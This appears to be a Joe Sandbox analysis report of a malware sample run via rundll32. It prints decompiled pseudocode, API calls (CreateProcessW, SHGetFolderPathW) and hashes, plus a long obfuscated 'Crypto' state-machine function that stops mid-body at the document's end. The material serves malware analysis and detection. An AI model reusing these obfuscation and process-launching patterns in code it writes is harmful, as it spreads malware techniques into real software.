                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                          • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                          • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                          • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00797F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 275 797f5d-797ff1 call 7a20b9 call 7aaa30 CreateProcessW
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0079AD99,?,?,?,181C8C04,0079AD99), ref: 00797FEB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                          • Instruction ID: 1e1d45e4a4569a1f9a92cb2215ead8a41b3d1c965aefd684e07f88587ef44c56
                                                                                                                          • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                          • Instruction Fuzzy Hash: B811D672402118FBDF619F95DD09CDF7F79EF0A3A4F149244F91921121D3768A60EBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A46BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 280 7a46bb-7a473b call 7a20b9 call 7aaa30 SHGetFolderPathW
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E007A46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E007A20B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E007AAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                          0x007a46d5
                                                                                                                          0x007a46da
                                                                                                                          0x007a46e4
                                                                                                                          0x007a46ec
                                                                                                                          0x007a46f3
                                                                                                                          0x007a46f7
                                                                                                                          0x007a46fe
                                                                                                                          0x007a4705
                                                                                                                          0x007a470c
                                                                                                                          0x007a4724
                                                                                                                          0x007a4735
                                                                                                                          0x007a473b

                                                                                                                          APIs
                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 007A4735
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderPath
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1514166925-0
                                                                                                                          • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                          • Instruction ID: 0d5677afc85f2c1c96b4dba0fb90b0a5b219106ff74724f31f8ff9de9b1e451a
                                                                                                                          • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                          • Instruction Fuzzy Hash: 54012C75801218FBCF15AFD5DC098DFBFB8EF45394F108145F91826212D2758A60DBD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007993ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 285 7993ed-799461 call 7aaa30 ExitProcess
                                                                                                                          C-Code - Quality: 73%
                                                                                                                          			E007993ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E007AAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                          0x007993f3
                                                                                                                          0x00799405
                                                                                                                          0x00799411
                                                                                                                          0x00799412
                                                                                                                          0x00799413
                                                                                                                          0x0079941a
                                                                                                                          0x00799421
                                                                                                                          0x00799428
                                                                                                                          0x00799433
                                                                                                                          0x00799436
                                                                                                                          0x0079943d
                                                                                                                          0x00799444
                                                                                                                          0x00799451
                                                                                                                          0x0079945b

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNELBASE(00000000), ref: 0079945B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                          • Instruction ID: 96a8f1e358ed3de6f80c1b8446f1aca97c586308450b8023066526d757505614
                                                                                                                          • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                          • Instruction Fuzzy Hash: E6F03C71D01308FBEB44DBE8DA4699DFBF4EB50314F2081A9D604B3261E7745F459B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 305 79b23c-79b2c6 call 7a20b9 call 7aaa30 lstrcmpiW
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E0079B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007A20B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E007AAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                          0x0079b23f
                                                                                                                          0x0079b240
                                                                                                                          0x0079b241
                                                                                                                          0x0079b244
                                                                                                                          0x0079b247
                                                                                                                          0x0079b24a
                                                                                                                          0x0079b24e
                                                                                                                          0x0079b24f
                                                                                                                          0x0079b254
                                                                                                                          0x0079b25e
                                                                                                                          0x0079b26a
                                                                                                                          0x0079b271
                                                                                                                          0x0079b278
                                                                                                                          0x0079b27f
                                                                                                                          0x0079b286
                                                                                                                          0x0079b28d
                                                                                                                          0x0079b294
                                                                                                                          0x0079b29b
                                                                                                                          0x0079b2b3
                                                                                                                          0x0079b2c1
                                                                                                                          0x0079b2c6

                                                                                                                          APIs
                                                                                                                          • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0079B2C1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1586166983-0
                                                                                                                          • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                          • Instruction ID: 7cf91498d9b2ac2057180634c5c764604e6d35dfbe4c9fdc21f5b3c40ab19c42
                                                                                                                          • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                          • Instruction Fuzzy Hash: D60116B2C04608FFDF45DFD4DD468AEBBB5EB45304F208188B90566262E3768B61AB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 007AE395 Relevance: 24.5, Strings: 19, Instructions: 720COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E007AE395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
				signed int _v4;
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _t823;
				void* _t829;
				signed int* _t832;
				signed int _t833;
				signed int _t845;
				signed int _t858;
				signed int _t862;
				intOrPtr _t868;
				signed int _t888;
				void* _t939;
				void* _t948;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t977;
				signed int _t981;
				signed int _t984;
				signed int _t985;
				signed int* _t988;
				void* _t991;

				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_v8 = __edx;
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx & 0x0000ffff);
				E007A20B9(__ecx & 0x0000ffff);
				_v284 = 0x99c43c;
				_t988 =  &(( &_v288)[0xd]);
				_v284 = _v284 + 0xbb14;
				_v284 = _v284 >> 0xb;
				_v284 = _v284 ^ 0x0000134f;
				_t862 = 0;
				_v120 = 0x27310;
				_t977 = 0x329d839;
				_t956 = 0x43;
				_v120 = _v120 / _t956;
				_v120 = _v120 + 0xe2f5;
				_v120 = _v120 ^ 0x0000ec43;
				_v36 = 0x50046c;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x00a00810;
				_v116 = 0x7f268a;
				_v116 = _v116 ^ 0x5f915552;
				_t957 = 0x1b;
				_v276 = 0;
				_v116 = _v116 * 0x3e;
				_v116 = _v116 ^ 0x3bc08e50;
				_v228 = 0xb299e8;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 << 0x10;
				_v228 = _v228 * 0x42;
				_v228 = _v228 ^ 0xb8144000;
				_v64 = 0x620921;
				_v64 = _v64 | 0xbe88b167;
				_v64 = _v64 ^ 0xbeaab967;
				_v172 = 0xae09b0;
				_v172 = _v172 | 0xde677f7d;
				_v172 = _v172 ^ 0xc5d04777;
				_v172 = _v172 ^ 0x1b3b388a;
				_v132 = 0xc06abb;
				_v132 = _v132 ^ 0x2b7b17d1;
				_v132 = _v132 / _t957;
				_v132 = _v132 ^ 0x059ea5d4;
				_v236 = 0x9fdac6;
				_v236 = _v236 >> 4;
				_v236 = _v236 + 0x9b65;
				_v236 = _v236 * 0x7b;
				_v236 = _v236 ^ 0x051f8b2b;
				_v108 = 0xc74878;
				_v108 = _v108 + 0x314b;
				_v108 = _v108 * 0x41;
				_v108 = _v108 ^ 0x32a5e883;
				_v196 = 0x1587ec;
				_v196 = _v196 ^ 0x07496474;
				_v196 = _v196 >> 7;
				_t958 = 0x2c;
				_v196 = _v196 / _t958;
				_v196 = _v196 ^ 0x000054ad;
				_v244 = 0xbebf62;
				_v244 = _v244 << 0xb;
				_v244 = _v244 + 0xffffca16;
				_v244 = _v244 << 0xe;
				_v244 = _v244 ^ 0x36858000;
				_v72 = 0x750de5;
				_v72 = _v72 | 0xb336b270;
				_v72 = _v72 ^ 0xb377bff5;
				_v256 = 0xc175fb;
				_t984 = 0x72;
				_t959 = 0x28;
				_v256 = _v256 * 0x26;
				_v256 = _v256 >> 5;
				_v256 = _v256 ^ 0xfb5a89da;
				_v256 = _v256 ^ 0xfbbf3581;
				_v76 = 0x1a7820;
				_v76 = _v76 | 0xb8d3f172;
				_v76 = _v76 ^ 0xb8dbf96d;
				_v224 = 0x97ff87;
				_v224 = _v224 / _t984;
				_v224 = _v224 >> 6;
				_v224 = _v224 * 0x5d;
				_v224 = _v224 ^ 0x0001effe;
				_v40 = 0x7c0450;
				_v40 = _v40 / _t959;
				_v40 = _v40 ^ 0x000319b6;
				_v136 = 0x260fad;
				_v136 = _v136 + 0x622a;
				_t960 = 0x1c;
				_v136 = _v136 / _t960;
				_v136 = _v136 ^ 0x00015e7e;
				_v288 = 0x61f743;
				_t961 = 0x66;
				_v288 = _v288 * 0x25;
				_v288 = _v288 ^ 0x0e2ee817;
				_v288 = 0x858eca;
				_v288 = _v288 / _t984;
				_v288 = _v288 ^ 0x0002de1a;
				_v280 = 0xcba1b8;
				_v280 = _v280 / _t961;
				_v280 = _v280 ^ 0xc2211053;
				_v280 = _v280 + 0xffff75b7;
				_v280 = _v280 ^ 0xc2279606;
				_v288 = 0x614b46;
				_v288 = _v288 >> 4;
				_v288 = _v288 ^ 0x000cf9c3;
				_v288 = 0x794624;
				_v288 = _v288 + 0xb4d0;
				_v288 = _v288 ^ 0x0072cd5b;
				_v288 = 0xcdbe83;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x00034ad6;
				_v288 = 0x24639d;
				_t962 = 0x28;
				_v288 = _v288 / _t962;
				_v288 = _v288 ^ 0x000e4507;
				_v288 = 0x4730ec;
				_t963 = 0x21;
				_v288 = _v288 / _t963;
				_v288 = _v288 ^ 0x0002fb4b;
				_v284 = 0xb301d9;
				_t964 = 0x4e;
				_v284 = _v284 / _t964;
				_v284 = _v284 + 0x8c1d;
				_v284 = _v284 ^ 0x00061f34;
				_v280 = 0xfdcbf7;
				_v280 = _v280 + 0x27a;
				_v280 = _v280 + 0xffff891b;
				_t965 = 0x46;
				_v280 = _v280 / _t965;
				_v280 = _v280 ^ 0x0008575c;
				_v284 = 0xc1d3a0;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 << 2;
				_v284 = _v284 ^ 0x000b0f76;
				_v112 = 0xeee25;
				_v112 = _v112 << 0xc;
				_v112 = _v112 << 4;
				_v112 = _v112 ^ 0xee2c14e7;
				_v180 = 0x8a49b3;
				_v180 = _v180 | 0xb0d6dc69;
				_v180 = _v180 + 0xffffa02a;
				_v180 = _v180 | 0x7fd27f38;
				_v180 = _v180 ^ 0xffd81443;
				_v152 = 0x628374;
				_v152 = _v152 >> 2;
				_v152 = _v152 + 0xffff73d9;
				_t966 = 0x2e;
				_v152 = _v152 / _t966;
				_v152 = _v152 ^ 0x0001ef4a;
				_v28 = 0xe4a1af;
				_v28 = _v28 + 0x32bc;
				_v28 = _v28 ^ 0x00ec33da;
				_v160 = 0x595a50;
				_v160 = _v160 + 0xffffdbfa;
				_v160 = _v160 + 0xffffb344;
				_t967 = 0x36;
				_v160 = _v160 / _t967;
				_v160 = _v160 ^ 0x0006861f;
				_v88 = 0x4d7ad3;
				_v88 = _v88 + 0xc28a;
				_v88 = _v88 ^ 0x004ca34c;
				_v48 = 0xf1782b;
				_v48 = _v48 ^ 0xe8a77c51;
				_v48 = _v48 ^ 0xe85593aa;
				_v100 = 0x42ea8e;
				_t985 = 0x2a;
				_v100 = _v100 / _t985;
				_v100 = _v100 ^ 0x000caa85;
				_v148 = 0xa48e68;
				_t968 = 6;
				_v148 = _v148 / _t968;
				_v148 = _v148 << 0xc;
				_v148 = _v148 ^ 0xb6d58e9e;
				_v252 = 0x4ff2e7;
				_t969 = 0xc;
				_v252 = _v252 / _t969;
				_v252 = _v252 << 6;
				_v252 = _v252 << 0xc;
				_v252 = _v252 ^ 0xa6466867;
				_v80 = 0x4d7637;
				_v80 = _v80 + 0xd199;
				_v80 = _v80 ^ 0x004dfa45;
				_v24 = 0xfee4b3;
				_t970 = 0x3e;
				_v24 = _v24 * 0x23;
				_v24 = _v24 ^ 0x22d37c34;
				_v204 = 0x24209;
				_v204 = _v204 + 0xffffcebc;
				_v204 = _v204 ^ 0x847f2e61;
				_v204 = _v204 + 0xffff5302;
				_v204 = _v204 ^ 0x847f4f7c;
				_v260 = 0x4a587;
				_v260 = _v260 * 0x4a;
				_v260 = _v260 + 0xffff9bf3;
				_v260 = _v260 + 0xffff92e5;
				_v260 = _v260 ^ 0x015b504d;
				_v164 = 0x6d05db;
				_v164 = _v164 * 0x14;
				_v164 = _v164 >> 4;
				_v164 = _v164 ^ 0x556abaa4;
				_v164 = _v164 ^ 0x55e01079;
				_v20 = 0x80cc5b;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000efc86;
				_v104 = 0xc8e6e2;
				_v104 = _v104 << 8;
				_v104 = _v104 >> 0x10;
				_v104 = _v104 ^ 0x000afff3;
				_v272 = 0x560e69;
				_v272 = _v272 + 0x2793;
				_v272 = _v272 * 0xe;
				_v272 = _v272 + 0xc902;
				_v272 = _v272 ^ 0x04bc6edc;
				_v16 = 0xfcaf67;
				_v16 = _v16 / _t970;
				_v16 = _v16 ^ 0x000c0ba9;
				_v56 = 0x81a14f;
				_v56 = _v56 >> 0xb;
				_v56 = _v56 ^ 0x000fb9cd;
				_v32 = 0x24333c;
				_v32 = _v32 / _t985;
				_v32 = _v32 ^ 0x00065bee;
				_v124 = 0xe3a445;
				_v124 = _v124 >> 5;
				_v124 = _v124 >> 7;
				_v124 = _v124 ^ 0x0000dfdf;
				_v220 = 0x5f21d9;
				_t971 = 0x79;
				_v220 = _v220 * 0x54;
				_v220 = _v220 << 5;
				_v220 = _v220 ^ 0x0e372a7b;
				_v220 = _v220 ^ 0xe8dc9c41;
				_v188 = 0xc44d01;
				_v188 = _v188 ^ 0x0373dd04;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0xfb03bbf0;
				_v188 = _v188 ^ 0x496460ca;
				_v268 = 0x8213af;
				_v268 = _v268 ^ 0x6d9501b2;
				_v268 = _v268 | 0x4d165578;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x06d55fab;
				_v212 = 0x705526;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 << 9;
				_v212 = _v212 >> 8;
				_v212 = _v212 ^ 0x000b72c4;
				_v92 = 0xc8093b;
				_v92 = _v92 + 0xd043;
				_v92 = _v92 ^ 0x00ca3bde;
				_v264 = 0x1f9619;
				_v264 = _v264 + 0xffffbc34;
				_v264 = _v264 * 0x3e;
				_v264 = _v264 * 0x52;
				_v264 = _v264 ^ 0x6e0edc82;
				_v96 = 0x6d9960;
				_v96 = _v96 | 0x9fb7a8f9;
				_v96 = _v96 ^ 0x9ff35e32;
				_v144 = 0x447df2;
				_v144 = _v144 << 8;
				_v144 = _v144 + 0xffff6cb2;
				_v144 = _v144 ^ 0x44714589;
				_v240 = 0x65db08;
				_v240 = _v240 * 6;
				_v240 = _v240 + 0x5f97;
				_v240 = _v240 >> 0xd;
				_v240 = _v240 ^ 0x000293b4;
				_v84 = 0x3c7c20;
				_v84 = _v84 ^ 0x2c3d49c2;
				_v84 = _v84 ^ 0x2c080053;
				_v248 = 0x13c85;
				_v248 = _v248 + 0x8cd8;
				_v248 = _v248 + 0x6e3d;
				_v248 = _v248 ^ 0xe59eace5;
				_v248 = _v248 ^ 0xe5984999;
				_v216 = 0x6164ef;
				_v216 = _v216 << 6;
				_v216 = _v216 + 0xffff2edc;
				_v216 = _v216 | 0xa66c888f;
				_v216 = _v216 ^ 0xbe7947d5;
				_v232 = 0x991e82;
				_v232 = _v232 + 0xffff48fb;
				_v232 = _v232 >> 0xe;
				_v232 = _v232 | 0x69e4ac2c;
				_v232 = _v232 ^ 0x69ef7d1b;
				_v68 = 0x9d94b2;
				_v68 = _v68 | 0xcead792c;
				_v68 = _v68 ^ 0xceb9e800;
				_v44 = 0x20071e;
				_v44 = _v44 / _t971;
				_v44 = _v44 ^ 0x000a654c;
				_v128 = 0x223cb7;
				_v128 = _v128 + 0x9bf0;
				_v128 = _v128 | 0x79b7d361;
				_v128 = _v128 ^ 0x79b3b147;
				_v52 = 0x8ed203;
				_v52 = _v52 + 0xffff1a7b;
				_v52 = _v52 ^ 0x008be8c4;
				_v208 = 0xe0ac17;
				_v208 = _v208 ^ 0xbcfe8cf2;
				_t972 = 0x6b;
				_v208 = _v208 / _t972;
				_v208 = _v208 | 0x3ee9ec5f;
				_v208 = _v208 ^ 0x3fec9c1d;
				_v192 = 0x219bfa;
				_v192 = _v192 >> 4;
				_v192 = _v192 + 0x77e4;
				_v192 = _v192 | 0x2fb4141c;
				_v192 = _v192 ^ 0x2fb2076e;
				_v200 = 0x8926e2;
				_v200 = _v200 << 4;
				_t973 = 0xc;
				_v200 = _v200 / _t973;
				_v200 = _v200 + 0xffff5704;
				_v200 = _v200 ^ 0x00bbfbcc;
				_v284 = 0xaed0cb;
				_v284 = _v284 + 0x9c17;
				_v284 = _v284 + 0xaf6d;
				_v284 = _v284 ^ 0x00b89bc1;
				_v168 = 0x914ce9;
				_v168 = _v168 | 0xceb3d4af;
				_v168 = _v168 ^ 0x5adaba1c;
				_v168 = _v168 ^ 0x3c292fbf;
				_v168 = _v168 ^ 0xa84ea968;
				_v156 = 0x90c891;
				_v156 = _v156 + 0xffff3667;
				_t974 = 0x5c;
				_v156 = _v156 / _t974;
				_t975 = 0x3c;
				_v156 = _v156 / _t975;
				_v156 = _v156 ^ 0x000da682;
				_v140 = 0xffcb83;
				_v140 = _v140 << 0xd;
				_v140 = _v140 | 0xcebab625;
				_v140 = _v140 ^ 0xfff71570;
				_v280 = 0xfef1ee;
				_v280 = _v280 >> 8;
				_v280 = _v280 + 0xffff306e;
				_v280 = _v280 | 0x3331510b;
				_v280 = _v280 ^ 0x3338227a;
				_v176 = 0xc7331d;
				_v176 = _v176 >> 7;
				_v176 = _v176 + 0x1d50;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x00370898;
				_v288 = 0x519041;
				_v288 = _v288 + 0x7cd9;
				_v288 = _v288 ^ 0x0057f5a9;
				_t976 = _v12;
				_t986 = _v12;
				while(1) {
					L1:
					_t939 = 0x68a9e90;
					while(1) {
						_t823 = _v184;
						while(1) {
							L3:
							_t991 = _t977 - _t939;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								__eflags =  *_v8;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v20);
									_t868 = E007ADCF7(_v164, 0x791524, __eflags);
									_v276 = _t868;
								}
								_t845 = _v244 | _v196 | _v108 | _v236 | _v132 | _v172 | _v64 | _v228 | _v116;
								_t981 = _a44 & 1;
								__eflags = _t981;
								if(_t981 != 0) {
									__eflags = _t845;
								}
								_push(_t868);
								_t976 = E007975FA(_t868, _t845, _v272, _t868, _v16, _a16, _v56, _v32, _v124, _t868, _v220, _v188, _v184);
								E0079A8B0(_v268, _v276, _v212);
								_t988 =  &(_t988[0xe]);
								__eflags = _t976;
								if(_t976 == 0) {
									_t977 = 0x51daea9;
								} else {
									_push(_v96);
									_push(_v264);
									_push(_v256);
									_v60 = 1;
									_push( &_v60);
									_push(_v92);
									_t948 = 4;
									E00799670(_t976, _t948);
									_t988 =  &(_t988[5]);
									__eflags = _t981;
									if(_t981 != 0) {
										E007A408E( &_v12, _v76, _v144, _v240, _t976,  &_v60, _v84, _v248);
										_t732 =  &_v60;
										 *_t732 = _v60 | _v136;
										__eflags =  *_t732;
										E00799670(_t976, _v12, _v216,  &_v60, _v224, _v232, _v68);
										_t988 =  &(_t988[0xb]);
									}
									_t977 = 0xbee37f5;
								}
								L11:
								_t868 = _v276;
								goto L1;
							}
							if(_t977 == 0x2602436) {
								_t977 = 0x506ebc3;
								continue;
							}
							if(_t977 == 0x329d839) {
								_t977 = 0x2602436;
								continue;
							}
							if(_t977 == 0x4bb42fe) {
								_t823 = E007988C3(_v100, _v148, _v40, _t868, _t868, _t986, _v252, _v80, _a36, _v24, _t868, _v4, _t868, _v204, _v260);
								_t868 = _v276;
								_t988 =  &(_t988[0xd]);
								__eflags = _t823;
								_v184 = _t823;
								_t939 = 0x68a9e90;
								_t977 =  !=  ? 0x68a9e90 : 0x9a35046;
								continue;
							}
							if(_t977 == 0x506ebc3) {
								_push(_t868);
								_push(_v72);
								_push(_v160);
								_push(_v28);
								_push(_v152);
								_t858 = E007ADAC6(_v112, _v180);
								_t986 = _t858;
								__eflags = _t858;
								_t977 =  !=  ? 0x4bb42fe : 0xdf8c541;
								E007A8519(_v88, _v48, 0);
								_t988 = _t988 - 0xc + 0x24;
								L37:
								_t868 = _v276;
								_t939 = 0x68a9e90;
								L38:
								__eflags = _t977 - 0xdf8c541;
								if(_t977 == 0xdf8c541) {
									L41:
									return _t862;
								}
								_t823 = _v184;
								continue;
							}
							if(_t977 != 0x51daea9) {
								goto L38;
							}
